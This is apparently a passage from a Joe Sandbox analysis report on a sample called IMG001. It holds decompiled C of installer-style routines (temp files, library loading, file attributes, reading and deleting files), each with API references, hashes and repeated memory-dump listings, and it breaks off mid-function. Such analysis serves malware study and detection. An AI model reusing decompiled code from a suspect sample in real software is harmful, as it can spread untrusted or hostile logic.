Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$/Fy$X$y$X$y$Xdy
API String ID: 4209647438-3969685544
Opcode ID: e581a1db5055c5a1f75047e6dbeb5af5b0b0b3ff451f60724f69a1395c480267
Instruction ID: 5e4643fca21cfadc9de8a04f2b9c08e4ac3460f651f3ecbcf400e8ec413ecb9d
Opcode Fuzzy Hash: e581a1db5055c5a1f75047e6dbeb5af5b0b0b3ff451f60724f69a1395c480267
Instruction Fuzzy Hash: 0C51A17180121AEBCF10DF65DA48A9F7BB8AB04359F10413BF914B72C1D7789E40DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004056F6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004056F6(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

APIs

GetTickCount.KERNEL32 ref: 00405709
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405723

Strings

nsa, xrefs: 00405702

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: a41147e2ad70ab0e88512ae138b54e0503036a62734e23b080708fabd9fe5612
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: 56F0A036348248BBEB104E55EC04B9B7FADDF91760F14C03BFA449B1C0D6B1995897A9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D12, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D12(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409200);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409204));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405d1a
0x00405d1d
0x00405d24
0x00405d2c
0x00405d39
0x00000000
0x00405d40
0x00405d2f
0x00405d37
0x00000000
0x00000000
0x00405d48

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
LoadLibraryA.KERNELBASE(?,?,00000000,00403121,00000008), ref: 00405D2F
GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction ID: e428d20ee9bf7b263dfbdc6b1eaa460cc0a746502d73873f4fda876fa73e4f8f
Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction Fuzzy Hash: 10E08C36A04510BBD3215F209E0896B73A8EEDAB40300487EF615F6251D734AC11DFBA

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7c56d0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7c168c =  *0x7c168c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7c168c, 0x7530,  *0x7c1674), 0);
					}
				}
				return 0;
			}

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d03ef6196a0a7671033119226856ac3e45730e14b7f79d2a7814547431d53b02
Instruction ID: 92ca41f03990f75d421953f0ce28a402da3267ab35400c7ec7b801fcc1cee25f
Opcode Fuzzy Hash: d03ef6196a0a7671033119226856ac3e45730e14b7f79d2a7814547431d53b02
Instruction Fuzzy Hash: 510144316242109BE7081B389D08B6A3398E710328F14823FF841F36F1EA38DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004056C7, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004056C7(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004056cb
0x004056d8
0x004056ed
0x004056f3

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C62,007FC000,80000000,00000003), ref: 004056CB
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056ED

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 004056A8, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004056A8(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x004056ac
0x004056b5
0x00000000
0x004056be
0x004056c4

APIs

GetFileAttributesA.KERNELBASE(?,004054B3,?,?,?), ref: 004056AC
SetFileAttributesA.KERNEL32(?,00000000), ref: 004056BE

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 5b6c8abf5c6657dd1eb2aacdbb88165d5ef3b362f1ace4ec03089f8aa3a349a3
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: 07C04CB1818501ABDA015B24DF0D82F7F66EB60322B508F35F56DE00F0CB355C66DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00403061, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403061(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x00403065
0x00403078
0x00403080
0x00000000
0x00403087
0x00000000
0x00403089

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EAB,000000FF,00000004,00000000,00000000,00000000), ref: 00403078

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction ID: 6f2b57ed93274e24fd49225d19a01d35385a3562131b0f82fbcc89c4f8353da0
Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction Fuzzy Hash: 9CE08631111118BBDF209F61DC00A977B6CEB05362F008036FE44E6190D530DA10DBB9

Uniqueness

Uniqueness Score: -1.00%

Function 004030AA, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004030AA(void* __eflags) {
				void* _t2;
				void* _t5;

				E00405C52(0x7f8000);
				_t2 = E00405550(0x7f8000);
				if(_t2 != 0) {
					E004054E3(0x7f8000);
					CreateDirectoryA(0x7f8000, 0); // executed
					_t5 = E004056F6(0x7f6000, 0x7f8000); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004030b1
0x004030b7
0x004030be
0x004030c3
0x004030cb
0x004030d7
0x004030dd
0x004030c1
0x004030c1
0x004030c1

APIs

Part of subcall function 00405C52: CharNextA.USER32(?,*?|<>/":,00000000,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CAA
Part of subcall function 00405C52: CharNextA.USER32(?,?,?,00000000), ref: 00405CB7
Part of subcall function 00405C52: CharNextA.USER32(?,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CBC
Part of subcall function 00405C52: CharPrevA.USER32(?,?,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CCC

CreateDirectoryA.KERNELBASE(007F8000,00000000,007F8000,007F8000,007F8000,00000000,00403228), ref: 004030CB

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: 111660282cd05cd50599e1b32aefeb5d230e43eccb9162907ef5bd7ffee1ca02
Instruction ID: 9f9433c174eaf46919c8f2835a4fc40c5a78850b628f18ddb5a9b5ca7a4d18ad
Opcode Fuzzy Hash: 111660282cd05cd50599e1b32aefeb5d230e43eccb9162907ef5bd7ffee1ca02
Instruction Fuzzy Hash: 7FD0C92151BD3031D9A2376A7D06FDF064C9F0272AF51447BFA04B52CA9E6C1A8209EE

Uniqueness

Uniqueness Score: -1.00%

Function 00403093, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403093(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x004030a1
0x004030a7

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 004030A1

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040345F, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040345F() {
				void* _t1;
				void* _t5;
				signed int _t7;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
					_t7 =  *0x409014;
				}
				E004034A4();
				return E00405315(_t5, _t7, 0x7fa000, 7);
			}

0x0040345f
0x00403467
0x0040346a
0x00403470
0x00403470
0x00403470
0x00403477
0x00403488

APIs

CloseHandle.KERNEL32(FFFFFFFF,004032CF,00000000), ref: 0040346A

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 159b179e4e6bc8d029fc7358266d2ddecdae431e3d30438ef32694cccd85c7ef
Instruction ID: 27fcf4ef6b82d90fa6b76e5efc9ad2767cda243669389ec156f82050e5a0f542
Opcode Fuzzy Hash: 159b179e4e6bc8d029fc7358266d2ddecdae431e3d30438ef32694cccd85c7ef
Instruction Fuzzy Hash: 3FC01270504A0096D2206FB59E4A9297A185B80336B908735B1B5F41F2C7BC5901493E

Uniqueness

Uniqueness Score: -1.00%

Function 0040550E, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040550E(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x0040550e
0x00405521
0x00405521
0x00405525
0x00000000
0x00000000
0x00405518
0x0040551b
0x00000000
0x0040551b
0x00000000
0x00405518
0x00405527

APIs

CharNextA.USER32(?,00403189,007EE000,00000020), ref: 0040551B

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
Instruction ID: f122a561dbca6e6a2661c513d308d78fe760f33df3102e4d704bae064200cbec
Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
Instruction Fuzzy Hash: 10C0807441C94077C51457505C244777FE1EA97741F188457F4C067154C1346840CF3F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405315, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 156
filestringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00405315(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004055C4(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72);
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x7c5728 =  *0x7c5728 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E004059F0(0x7b84b8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E0040552A(_t72);
					} else {
						lstrcatA(0x7b84b8, "\*.*");
					}
					__eflags =  *_t72;
